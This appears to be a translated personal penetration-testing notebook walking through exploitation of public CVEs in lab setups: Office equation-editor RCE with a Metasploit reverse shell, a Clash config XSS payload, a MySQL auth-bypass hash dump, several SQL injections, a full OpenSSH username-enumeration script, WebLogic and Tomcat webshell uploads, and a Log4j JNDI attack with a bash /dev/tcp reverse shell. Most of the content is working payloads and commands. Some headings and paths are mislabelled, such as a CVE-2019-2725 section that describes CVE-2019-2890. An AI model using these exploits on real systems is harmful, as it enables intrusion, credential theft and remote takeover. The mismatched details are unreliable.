Office vulnerabilities

Vulnerability overview

CVE-2017-11882 is a buffer-overflow vulnerability. It arises in EQNEDT32.EXE (the Equation Editor shipped with Microsoft Office): when the process reads OLE data containing a MathType equation and copies the equation's font name (the Font Name data), it never checks the name's length, so the buffer overflows. By overwriting the function's return address an attacker can execute arbitrary code.

On 14 November 2017 Microsoft released its November security update; the flaw affects all popular Office versions.

Attribute | Value
Vulnerability ID | CVE-2017-11882
Vulnerability name | Microsoft Office Equation Editor memory corruption vulnerability
Vulnerability type | Remote code execution
Threat type | Stack overflow
Affected versions | Microsoft Office 2000/2003/2007 SP3/2010 SP2/2013 SP1/2016

Environment

Attacker: Kali, IP 192.168.31.14
Victim: Windows 7, IP 192.168.31.55, Microsoft Office 2016
Generator for the malicious document: https://github.com/Ridter/CVE-2017-11882

EXP

Download: https://github.com/Ridter/CVE-2017-11882
Command:

git clone https://github.com/Ridter/CVE-2017-11882

Generating the malicious document

Enter the directory: cd CVE-2017-11882
The file generated below makes the victim launch the calculator:

python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

The embedded command starts the calculator.

You can see that a file named test.doc has been generated.

Opening it on the target Windows 7 machine launches the calculator.

EXP generation

An .hta file is an HTML Application. Most Windows versions can run .hta files; they are parsed and executed by mshta.exe, and the .hta file can be local or on a reachable remote host.

Module: use exploit/windows/misc/hta_server
Payload: set payload windows/meterpreter/reverse_tcp

  • This step can be skipped, because the module already defaults to windows/meterpreter/reverse_tcp.

Web address: set SRVHOST <Kali IP>
Web port: set SRVPORT <chosen port>
Address: set RHOST <Kali IP>
Listening port: set LPORT <listening port>
Run: exploit -j (the -j flag keeps the job in the background)
Result:
The address shown is http://192.168.31.14:8090/bblVmviVL2gVIES.hta

EXP generation
Put the web address opened above into the command below:

python Command109b_CVE-2017-11882.py -c "mshta http://192.168.31.14:8090/bblVmviVL2gVIES.hta" -o test.doc

It generates a test.doc.

Open test.doc on the Windows 7 machine and a shell comes back.

List the sessions:

sessions -l

Enter the shell:

sessions -i 1

Once inside the shell you can do whatever you want.

References

国光
https://www.freebuf.com/articles/web/183551.html

MetInfo 4.0 arbitrary user password change vulnerability

Environment

Server: Windows 2003 running phpStudy 2018, MetInfo 4.0
Attacker: Kali Linux

Setting up the lab

MetInfo 4.0 download: https://www.metinfo.cn/upload/file/update/MetInfo4.0.zip
phpStudy 2018 download: http://public.xp.cn/upgrades/PhpStudy2018.zip

Extract the downloaded MetInfo 4.0 archive.

Visit http://ip/MetInfo/

That completes the installation.

The vulnerability

First register a member account.

Fill in the registration form.

Log in.

Go to the change-password function.

Capture the request with Burp.
You can see that this field is the username whose password is being changed.

Change it to the administrator account admin.

The change succeeds.

Open the administrator page.

Log in with the password abc that was set during the change;
the login succeeds.

Weblogic SSRF vulnerability

Background

SSRF means:
a web feature fetches other web resources through the server itself, for example a service that retrieves other pages or images for the user.
An attacker can abuse that fetch feature to probe the internal network, scan ports and so on.

Setting up the lab

Vulhub is an open-source vulnerability range aimed at the general public; no Docker knowledge is needed, and two commands build and run a complete vulnerable image.

Installation steps follow.

Installing pip

On Kali it can be installed directly with:

apt install python3-pip

On other systems download and install it as follows.
Official download: https://pypi.org/project/pip/#files
Run this command to download it:

curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py

Install:

python3 get-pip.py

Installing docker-compose

Install it with pip (pip installation is described above).
Download command:

pip3 install docker-compose

Or install it this way:

apt install docker-compose

Downloading vulhub

Command:

git clone https://github.com/vulhub/vulhub.git

Because the download was slow I went through a proxy, which was much faster.

Installing Docker

On Kali run this command to install it directly:

apt install docker.io

On other Linux distributions use:

curl -s https://get.docker.com/ | sh

Starting and testing Docker

Start command:

systemctl start docker

Test command:

docker run hello-world

If this prints the hello-world output, Docker is ready to use.

Starting the environment

Entering the directory you can see many test environments.

Below I start the weblogic/ssrf range.
Enter the directory:

cd weblogic/ssrf/

Directory contents:

Start command:

docker-compose up -d

When it finishes it has pulled the image and started the container.

Check that the SSRF range is running.

Command:

docker ps

It is confirmed running.

Visit the page:

http://<kali ip>:7001

Getting started

The vulnerable address:

http://<kali ip>:7001/uddiexplorer/SearchPublicRegistries.jsp

Clash RCE vulnerability

Affected range

Windows versions below v0.19.9

POC

port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
  - name: a<img/src="1"/onerror=eval(`require("child_process").exec("notepad.exe");`);>
    type: socks5
    server: 127.0.0.1
    port: "17938"
    skip-cert-verify: true
  - name: abc
    type: socks5
    server: 127.0.0.1
    port: "8088"
    skip-cert-verify: true

proxy-groups:
  - name: <img/src="1"/onerror=eval(`require("child_process").exec("notepad.exe");`);>
    type: select
    proxies:
      - a<img/src="1"/onerror=eval(`require("child_process").exec("notepad.exe");`);>

Import this as a Clash configuration file.

CVE-2012-2122 MySQL authentication bypass and its exploitation

Affected range

Vulnerability description

When a client connects to MariaDB/MySQL, the password it supplies is compared with the expected correct password. Because that comparison is handled incorrectly, MySQL can treat the two passwords as equal even when memcmp() returns a non-zero value. According to the advisory, roughly one attempt in 256 hits the bug.

Affected versions:

  • MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not affected.
  • MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not affected.
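As an added illustration that is not part of the original post or of MySQL's source, the Python below models the int-to-one-byte narrowing that made the comparison fail and derives the roughly 1/256 rate quoted above; the function names and the assumed 16-bit range of memcmp() results are choices of this model.

```python
def to_my_bool(memcmp_result: int) -> int:
    """Model the int -> char narrowing that the pre-fix check applied to
    memcmp()'s result (my_bool was a one-byte type): only the low byte
    survives, read back as a signed char."""
    low = memcmp_result & 0xFF
    return low - 256 if low > 127 else low


def vulnerable_password_match(memcmp_result: int) -> bool:
    # Vulnerable shape: "passwords equal" iff the narrowed value is 0, so
    # every memcmp() result that is a multiple of 256 is a false match.
    return to_my_bool(memcmp_result) == 0


def fixed_password_match(memcmp_result: int) -> bool:
    # Fixed shape: collapse the result to 0/1 *before* it is narrowed.
    return to_my_bool(1 if memcmp_result != 0 else 0) == 0


def false_match_probability(width_bits: int = 16) -> float:
    """Fraction of non-zero memcmp() results in (-2**w, 2**w) that the
    vulnerable check accepts. An optimised memcmp() may return any such
    byte difference rather than just -1/0/1, which is what made the bug
    reachable; with the scramble randomised per connection this is the
    per-attempt success rate, about 1/256."""
    limit = 1 << width_bits
    results = [v for v in range(-limit + 1, limit) if v != 0]
    bad = sum(1 for v in results if vulnerable_password_match(v))
    return bad / len(results)
```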

Lab

Enter /vulhub/phpmyadmin/CVE-2018-12613

docker-compose up -d

zss@zss > ~/漏洞/vulhub/mysql/CVE-2012-2122>>> sudo docker-compose up -d           
[sudo] zss 的密码:
Starting cve-2012-2122_mysql_1 ... done

Vulnerability verification

Start msfconsole:

msf6 > use  auxiliary/scanner/mysql/mysql_authbypass_hashdump 
msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set RHOSTS 60.2.185.218
RHOSTS => 60.2.185.218
msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set THREADS 10 # 设置线程
THREADS => 10
msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > run
[+] 192.168.0.106:3306 - 192.168.0.106:3306 The server allows logins, proceeding with bypass test
[*] 192.168.0.106:3306 - 192.168.0.106:3306 Authentication bypass is 10% complete
[*] 192.168.0.106:3306 - 192.168.0.106:3306 Authentication bypass is 20% complete
[*] 192.168.0.106:3306 - 192.168.0.106:3306 Authentication bypass is 30% complete
[*] 192.168.0.106:3306 - 192.168.0.106:3306 Authentication bypass is 40% complete
[+] 192.168.0.106:3306 - 192.168.0.106:3306 Successfully bypassed authentication after 411 attempts. URI: mysql://root:Egvoq@192.168.0.106:3306
[+] 192.168.0.106:3306 - 192.168.0.106:3306 Successfully exploited the authentication bypass flaw, dumping hashes...
[+] 192.168.0.106:3306 - 192.168.0.106:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.0.106:3306 - 192.168.0.106:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.0.106:3306 - 192.168.0.106:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.0.106:3306 - 192.168.0.106:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.0.106:3306 - 192.168.0.106:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.0.106:3306 - 192.168.0.106:3306 Hash Table has been saved: /home/zss/.msf4/loot/20211230110548_default_192.168.0.106_mysql.hashes_615289.txt
[*] 192.168.0.106:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The dumped hash can be looked up at https://www.cmd5.com/


DedeCMS V5.7 SP2 back-end code execution vulnerability

Setup

Installation is straightforward: it only asks for a database password, so I will not go into it.
The server I used is phpStudy.
Download: xp.cn
Official DedeCMS V5.7 SP2 download: http://dedecms.com/products/dedecms/downloads/
I saved the copy downloaded from the official site on Lanzou cloud: https://wwa.lanzous.com/i8zW7h12t9i

The vulnerability

Log in to the back end under /dede/.
The default username is admin and the password is admin.

Login succeeded.

Then visit this address:

<domain>/dede/tpl.php?action=upload

View the page source to find the token.

Write the malicious script:

<domain>/dede/tpl.php?filename=secquan.lib.php&action=savetagfile&content=<?php%20phpinfo();?>&token=

phpcms v9.6.0 SQL injection vulnerability

Setup

The vulnerability

Visit /index.php?m=wap&c=index&a=init&siteid=1 to obtain a cookie.


Then send a POST request to the following URL, whose src parameter carries an error-based SQL injection statement:

http://192.168.0.103/phpcms_v9.6.0_UTF8/install_package/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27%20and%20updatexml%281%2Cconcat%281%2C%28user%28%29%29%29%2C1%29%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26

Decoded, it reads: http://192.168.0.103/phpcms_v9.6.0_UTF8/install_package/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=&id=%*27 and updatexml(1,concat(1,(user())),1)#&m=1&f=haha&modelid=2&catid=7&

POST body:

userid_flash=d698WOQsXmCwdTCLSW5CN_aEUeQVAPcFAqSq7-nZ  # the cookie value obtained from the request above


This yields a second cookie.

Then build a GET request; the value after a_k= is that second cookie:

...init&a_k=<cookie value from above>

http://192.168.0.103/phpcms_v9.6.0_UTF8/install_package/index.php?m=content&c=down&a=init&a_k=8068qLWSDNB6ODqmqllaIwav_Hh7JQ3UAYGM81uI6D28x1Ubvkq6I-eT-9x9_uEFnGlxXOKJd7pfkV5XRYm7SEviSS0157Bxmo7GZ1Kgen31-u1grBBNY680KOFbTHOP4SV8k0Fl_UAjbLEpwUXPM7tQYy5DWyJCpGnGwhuL_WnKLP42si9b9gwSJ8KA5j88xoqH-iZauCig-7fB_CanZkS7dNxiV2s82RbisYiOLn-TFFH--2JwuF_aIjV0T69gWyxRhwV6Co8IJRQd91bpHGzs6uArES6h1y95Y-W6pmpECSE8FSdSy2K0SaCN6Kga8ouCsLq7M1tTw-K59Y_ranYXcaF1N_tvsmDAd7LNxreK3OCoCm_yM8h1BQ4XLIuFgnY8Y4PtiOoOhbihN707k3CQm9ivw1Apwrd3KGrbMC3Euu7f1LjmVErIUdzga8dypNR3zap5NlU4mUoUVpzpKNwnmZercDH_OeqIutAMqvxy3QKiNorKpCR2vA

OpenSSH username enumeration vulnerability (CVE-2018-15473)

OpenSSH before 7.7 has a username enumeration vulnerability: through it an attacker can determine whether a given username exists on the target host.

References:
· http://openwall.com/lists/oss-security/2018/08/15/5
· https://github.com/Rhynorater/CVE-2018-15473-Exploit
· https://www.anquanke.com/post/id/157607

Target: metasploitable-linux-2.0.0

Install the paramiko dependency:

pip3 install "paramiko == 2.0.8"

Download the script directly:
https://github.com/Rhynorater/CVE-2018-15473-Exploit

Or copy the code below
and save it as sshUsernameEnumExploit.py

#!/usr/bin/env python
###########################################################################
# ____ _____ _____ _ _ #
# / __ \ / ____/ ____| | | | #
# | | | |_ __ ___ _ __ | (___| (___ | |__| | #
# | | | | '_ \ / _ \ '_ \ \___ \\___ \| __ | #
# | |__| | |_) | __/ | | |____) |___) | | | | #
# \____/| .__/ \___|_| |_|_____/_____/|_| |_| #
# | | Username Enumeration #
# |_| #
# #
###########################################################################
# Exploit: OpenSSH Username Enumeration Exploit (CVE-2018-15473) #
# Vulnerability: CVE-2018-15473 #
# Affected Versions: OpenSSH version < 7.7 #
# Author: Justin Gardner, Penetration Tester @ SynerComm AssureIT #
# Github: https://github.com/Rhynorater/CVE-2018-15473-Exploit #
# Email: Justin.Gardner@SynerComm.com #
# Date: August 20, 2018 #
###########################################################################

import argparse
import logging
import paramiko
import multiprocessing
import socket
import string
import sys
import json
from random import randint as rand
from random import choice as choice
# store function we will overwrite to malform the packet
old_parse_service_accept = paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_SERVICE_ACCEPT]

# list to store 3 random usernames (all ascii_lowercase characters); this extra step is added to check the target
# with these 3 random usernames (there is an almost 0 possibility that they can be real ones)
random_username_list = []
# populate the list
for i in range(3):
    user = "".join(choice(string.ascii_lowercase) for x in range(rand(15, 20)))
    random_username_list.append(user)

# create custom exception
class BadUsername(Exception):
    def __init__(self):
        pass

# create malicious "add_boolean" function to malform packet
def add_boolean(*args, **kwargs):
    pass

# create function to call when username was invalid
def call_error(*args, **kwargs):
    raise BadUsername()

# create the malicious function to overwrite MSG_SERVICE_ACCEPT handler
def malform_packet(*args, **kwargs):
    old_add_boolean = paramiko.message.Message.add_boolean
    paramiko.message.Message.add_boolean = add_boolean
    result = old_parse_service_accept(*args, **kwargs)
    #return old add_boolean function so start_client will work again
    paramiko.message.Message.add_boolean = old_add_boolean
    return result

# create function to perform authentication with malformed packet and desired username
def checkUsername(username, tried=0):
    sock = socket.socket()
    sock.connect((args.hostname, args.port))
    # instantiate transport
    transport = paramiko.transport.Transport(sock)
    try:
        transport.start_client()
    except paramiko.ssh_exception.SSHException:
        # server was likely flooded, retry up to 3 times
        transport.close()
        if tried < 4:
            tried += 1
            return checkUsername(username, tried)
        else:
            print('[-] Failed to negotiate SSH transport')
    try:
        transport.auth_publickey(username, paramiko.RSAKey.generate(1024))
    except BadUsername:
        return (username, False)
    except paramiko.ssh_exception.AuthenticationException:
        return (username, True)
    #Successful auth(?)
    raise Exception("There was an error. Is this the correct version of OpenSSH?")

# function to test target system using the randomly generated usernames
def checkVulnerable():
    vulnerable = True
    for user in random_username_list:
        result = checkUsername(user)
        if result[1]:
            vulnerable = False
    return vulnerable

def exportJSON(results):
    data = {"Valid":[], "Invalid":[]}
    for result in results:
        if result[1] and result[0] not in data['Valid']:
            data['Valid'].append(result[0])
        elif not result[1] and result[0] not in data['Invalid']:
            data['Invalid'].append(result[0])
    return json.dumps(data)

def exportCSV(results):
    final = "Username, Valid\n"
    for result in results:
        final += result[0]+", "+str(result[1])+"\n"
    return final

def exportList(results):
    final = ""
    for result in results:
        if result[1]:
            final+=result[0]+" is a valid user!\n"
        else:
            final+=result[0]+" is not a valid user!\n"
    return final

# assign functions to respective handlers
paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_SERVICE_ACCEPT] = malform_packet
paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_USERAUTH_FAILURE] = call_error

# get rid of paramiko logging
logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())

arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('hostname', type=str, help="The target hostname or ip address")
arg_parser.add_argument('--port', type=int, default=22, help="The target port")
arg_parser.add_argument('--threads', type=int, default=5, help="The number of threads to be used")
arg_parser.add_argument('--outputFile', type=str, help="The output file location")
arg_parser.add_argument('--outputFormat', choices=['list', 'json', 'csv'], default='list', type=str, help="The output file location")
group = arg_parser.add_mutually_exclusive_group(required=True)
group.add_argument('--username', type=str, help="The single username to validate")
group.add_argument('--userList', type=str, help="The list of usernames (one per line) to enumerate through")
args = arg_parser.parse_args()

def main():
    sock = socket.socket()
    try:
        sock.connect((args.hostname, args.port))
        sock.close()
    except socket.error:
        print('[-] Connecting to host failed. Please check the specified host and port.')
        sys.exit(1)

    # first we run the function to check if host is vulnerable to this CVE
    if not checkVulnerable():
        # most probably the target host is either patched or running a version not affected by this CVE
        print("Target host most probably is not vulnerable or already patched, exiting...")
        sys.exit(0)
    elif args.username: #single username passed in
        result = checkUsername(args.username)
        if result[1]:
            print(result[0]+" is a valid user!")
        else:
            print(result[0]+" is not a valid user!")
    elif args.userList: #username list passed in
        try:
            f = open(args.userList)
        except IOError:
            print("[-] File doesn't exist or is unreadable.")
            sys.exit(3)
        usernames = map(str.strip, f.readlines())
        f.close()
        # map usernames to their respective threads
        pool = multiprocessing.Pool(args.threads)
        results = pool.map(checkUsername, usernames)
        try:
            if args.outputFile:
                outputFile = open(args.outputFile, "w")
        except IOError:
            print("[-] Cannot write to outputFile.")
            sys.exit(5)
        if args.outputFormat=='json':
            if args.outputFile:
                outputFile.writelines(exportJSON(results))
                outputFile.close()
                print("[+] Results successfully written to " + args.outputFile + " in JSON form.")
            else:
                print(exportJSON(results))
        elif args.outputFormat=='csv':
            if args.outputFile:
                outputFile.writelines(exportCSV(results))
                outputFile.close()
                print("[+] Results successfully written to " + args.outputFile + " in CSV form.")
            else:
                print(exportCSV(results))
        else:
            if args.outputFile:
                outputFile.writelines(exportList(results))
                outputFile.close()
                print("[+] Results successfully written to " + args.outputFile + " in List form.")
            else:
                print(exportList(results))
    else: # no usernames passed in
        print("[-] No usernames provided to check")
        sys.exit(4)

if __name__ == '__main__':
    main()

Command:

python3 sshUsernameEnumExploit.py --port <port> --userList <wordlist file> <target ip>

The usernames have been enumerated.

Dami CMS 5.4 business-logic vulnerability

Test environment

Server: Windows 2003, Dami CMS 5.4
Attacker: Windows 10

Setup

Extract the files.

Visit http://ip/dami
When the page below appears, choose Agree.

Check whether anything is reported as wrong.

The default database name is root.

Installation is complete.

The vulnerability

First register a user.

Log in.

Buy a product.

It reports that the balance is insufficient.

Capture the request with Burp.

Decode it.

This field should be the quantity.

Change it to -1 and forward the request.

The purchase succeeds,

and the balance has even increased.

Zabbix SQL injection vulnerability (CVE-2016-10134)

Zabbix is an enterprise-grade open-source solution with a web interface for distributed system and network monitoring. It monitors a wide range of network parameters to keep server systems running securely, and provides a flexible notification mechanism so that administrators can quickly locate and resolve problems.

Zabbix consists of two parts: the Zabbix server and the optional Zabbix agent. The server monitors remote servers and network state and collects data via SNMP, the Zabbix agent, ping, port monitoring and other methods; it runs on Linux, Solaris, HP-UX, AIX, FreeBSD, OpenBSD, OS X and other platforms.

Vulnerable versions

zabbix 2.2.x, 3.0.0-3.0.3

Setup

cd vulhub/zabbix/CVE-2016-10134
sudo docker-compose up -d

The vulnerability

The vulnerable location:

/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)

Reading the database names:

/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=extractvalue(1,(select%20group_concat(schema_name)%20from%20information_schema.schemata))

Running sqlmap:

sqlmap -u "http://43.138.105.228:8081/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=1"

Sunlogin (向日葵) command execution vulnerability (CNVD-2022-10270)

Test environment

Sunlogin personal edition for Windows: https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270

Affected versions

Sunlogin personal edition for Windows <= 11.0.0.33

Sunlogin Lite <= V1.0.1.43315 (2021.12)

Environment

I used version 10.3.0.27372, downloaded from https://wwi.lanzouy.com/irKi301jjype

Detection and exploitation tool: https://github.com/Mr-xn/sunlogin_rce/releases/tag/new

Extract it and give it execute permission.

The vulnerability

Tool usage:

 zss@zss>>> ./xrkRce


╔═╗┬ ┬┌┐┌╦ ┌─┐┌─┐┬┌┐┌ ╦═╗┌─┐┌─┐
╚═╗│ ││││║ │ ││ ┬││││───╠╦╝│ ├┤
╚═╝└─┘┘└┘╩═╝└─┘└─┘┴┘└┘ ╩╚═└─┘└─┘

by:T00ls.net
向日葵Rce
----------------------------------------------

Usage of ./xrkRce:
-c string //要执行的命令
cmd
-h string //目标ip
ip
-p string //指定扫描端口默认40000-65535
port:40000-65535 (default "40000-65535")
-t string //执行模式默认扫描模式(scan) 代码执行模式(rce)
type (default "scan")
-x int //指定线程默认1000
x (default 1000)

Target scan:

./xrkRce -h 192.168.0.107 -t scan

Command execution:

./xrkRce -h 192.168.0.107 -t rce -p 49180 -c "ipconfig"

Tomcat 7+ weak password and back-end getshell vulnerability

Start the vulhub range:

# switch to the vulhub directory
cd vulhub/tomcat/tomcat8
# start the image
docker-compose up -d

Go to http://127.0.0.1:8080

Username tomcat, password tomcat.

Zip the webshell file.

Then rename the archive to .war.

Then upload the archive.

Then visit this address: http://127.0.0.1:8080/shell/shell.jsp

Shiro RCE 550

Weblogic deserialization remote code execution vulnerability (CVE-2019-2725)

Overview

On 16 October 2019 WebLogic published a security patch announcement fixing high-risk vulnerabilities including CVE-2019-2890. When WebLogic loads remote resources over the T3 protocol it applies a blacklist by default to keep deserialization safe. CVE-2019-2890 bypasses WebLogic's deserialization blacklist, so an attacker can attack vulnerable WebLogic components remotely over T3; however, the conditions for exploiting it are demanding, and Oracle classifies it as requiring authentication.

Principle

When remote resources are loaded over T3, a blacklist filter is applied by default to keep deserialization safe. This vulnerability bypasses that blacklist, letting an attacker attack vulnerable WebLogic components remotely over T3. Because T3 is enabled by default whenever the WebLogic console is enabled, and a default WebLogic installation enables the console automatically, an attacker can use this flaw for remote code execution and take control of the WebLogic server.

Affected versions

WebLogic Server 10.3.6.0

WebLogic Server 12.1.3.0

WebLogic Server 12.2.1.3

Setup

Enter the directory:

cd vulhub/weblogic/CVE-2017-10271/

Start:

sudo docker-compose up -d

Visit http://ip:7001/console/login/LoginForm.jsp

Host a web server serving a file xxxx.txt with the following content:

<%
if("123".equals(request.getParameter("pwd"))){
    java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
    int a = -1;
    byte[] b = new byte[1024];
    out.print("<pre>");
    while((a=in.read(b))!=-1){
        out.println(new String(b));
    }
    out.print("</pre>");
}
%>


The vulnerable endpoint is http://ip:7001/_async/AsyncResponseService

Build the Burp request

Replace the IP below with the address of the xxx.txt hosted above.

The request writes the file as 1.jsp.

POST /_async/AsyncResponseService HTTP/1.1
Host: wp.zssnp.top:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 855
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
content-type: text/xml


<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget http://ip/xxx.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/1.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

A 202 response means the file was written.

Then visit 1.jsp:

http://xxxx:7001/_async/1.jsp?pwd=123&cmd=id

Weblogic arbitrary file upload vulnerability (CVE-2018-2894)

Overview

Two unauthenticated pages on the WebLogic management side allow arbitrary JSP files to be uploaded, which leads to server compromise.

Oracle's July update fixed an arbitrary file upload in the WebLogic Web Service Test Page. The Test Page is disabled by default in production mode, so the flaw has some limitations. The two pages are /ws_utc/begin.do and /ws_utc/config.do.

Affected versions

weblogic 10.3.6.0, weblogic 12.1.3.0, weblogic 12.2.1.2, weblogic 12.2.1.3.

Setup

Enter vulhub/weblogic/CVE-2018-2894

Start:

sudo docker-compose up -d

Get the username and password:

docker-compose logs | grep password

Once the environment is up, visit http://xxxx:7001/console and log in with that username and password.

Then visit http://xxxx:7001/ws_utc/config.do

Set Work Home Dir to /u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css and submit.

Then search for "password" to find the timestamp.

Then visit http://xxx:7001/ws_utc/css/config/keystore/[timestamp]_[filename]

Connect.

log4j vulnerability CVE-2021-44228

Setup

sudo docker pull vulfocus/log4j2-rce-2021-12-09:latest
sudo docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09

Vulnerability verification

Open the page.

It redirects to the address below.

Use DNSLog.

URL-encode ${jndi:ldap://smfd8.dnslog.zssnp.top} and submit it.

The vulnerability is confirmed.
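On the defensive side, the check above is what a log review has to recognise. The following Python is an added example, not part of the original post or of any Log4j tooling: it URL-decodes a request field (the form above submits the lookup URL-encoded) and reports lines carrying a ${jndi:...} lookup, also resolving the nested ${lower:...}/${::-...} lookups Log4j would evaluate; the function names and the sample log lines are constructed for this example.

```python
import re
from urllib.parse import unquote

# Log4j resolves lookups inside-out; these two shapes are used to hide "jndi".
_LOOKUP_CASE = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_LOOKUP_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")


def normalize(value: str) -> str:
    """Undo URL encoding (twice, for double-encoded submissions) and
    collapse nested lookups until the string is stable; lower-case the
    result so matching is case-insensitive."""
    s = unquote(unquote(value))
    prev = None
    while s != prev:
        prev = s
        s = _LOOKUP_CASE.sub(lambda m: m.group(1), s)
        s = _LOOKUP_DEFAULT.sub(lambda m: m.group(1), s)
    return s.lower()


def is_jndi_lookup(value: str) -> bool:
    return "${jndi:" in normalize(value)


def scan_log(lines):
    """Return (line number, normalized line) for every line containing a
    JNDI lookup anywhere: query string, header, or logged user agent."""
    hits = []
    for n, line in enumerate(lines, 1):
        if is_jndi_lookup(line):
            hits.append((n, normalize(line)))
    return hits


# Constructed sample lines (not from the page), in a common access-log shape.
SAMPLE_LOG = [
    '10.0.0.5 - - [31/May/2023:10:48:43 +0800] "GET /hello?payload=%24%7Bjndi%3Aldap%3A%2F%2Fdns.example.invalid%2Fa%7D HTTP/1.1" 200 12',
    '10.0.0.5 - - [31/May/2023:10:49:01 +0800] "GET /hello?payload=hello HTTP/1.1" 200 12',
    '10.0.0.7 - - [31/May/2023:10:50:10 +0800] "GET /hello?payload=%24%7B%24%7Blower%3Aj%7Dndi%3Armi%3A%2F%2F10.0.0.9%3A1099%2Fx%7D HTTP/1.1" 200 12',
    '10.0.0.8 - - [31/May/2023:10:51:00 +0800] "GET /hello HTTP/1.1" 200 12 "-" "${${::-j}ndi:ldap://10.0.0.9/x}"',
]

if __name__ == "__main__":
    for n, text in scan_log(SAMPLE_LOG):
        print(f"line {n}: {text}")
```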

Reverse shell

I use the JNDI injection tool from https://github.com/bkfish/Apache-Log4j-Learning/tree/main

Listen with nc:

nc -lvvp 9999

Format:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "<command to execute>" -A "<IP to connect back to>"

Use the following command for the reverse shell:

bash -i >& /dev/tcp/<reverse-connection ip>/<reverse-connection port> 0>&1

Then encode it.

Address: https://ares-x.com/tools/runtime-exec/

bash -c {echo,YmFzaCAtaSAxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx+JjE=}|{base64,-d}|{bash,-i}

Once the command above is generated, run it on the server:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSAxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx+JjE=}|{base64,-d}|{bash,-i}" -A "<server IP>"

Run it.

You can see that several variants for different runtime versions are generated.

These variants correspond to the runtime of the vulnerable target service; the matching one must be used.

We simply copy the lower one of the two above.

Build:

${jndi:rmi://43.xxx.xx.xx:1099/vm9adu}

Then URL-encode it.

Submit.

The server shows a successful connection.

Struts2 vulnerabilities

S2-001 (CVE-2007-4556)

ThinkPHP 5.x SQL injection and sensitive information disclosure vulnerabilities

I am 啊锋 (A-Feng), a hard-working underachiever who has only just stepped through the door of security. I hope to summarise what I learn and share it on my blog so that we can progress, exchange ideas and learn together.

Affected versions:
<5.0.9
The key precondition for this vulnerability is that debug mode is enabled.

The vulnerability:
vulhub directory: cd vulhub/phpmyadmin/CVE-2018-12613#
Build the range: docker-compose build
Run the range: docker-compose up -d

After starting, visit http://your-ip/index.php?ids[]=1&ids[]=2 and you will see the username displayed, which shows the environment is running. Then open the page and insert an error-based SQL injection statement:
http://your-ip/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1, and you will see the message displayed successfully:

It is worth noting that this leak of the database account and password only occurs when the SQL statement fails or throws an exception. In debug mode without a SQL syntax error, the database account and password are not leaked.

Ecshop SQL injection

xianzhi-2017-02-82239600
Starting the range
In a terminal, enter the prepared vulhub range directory:

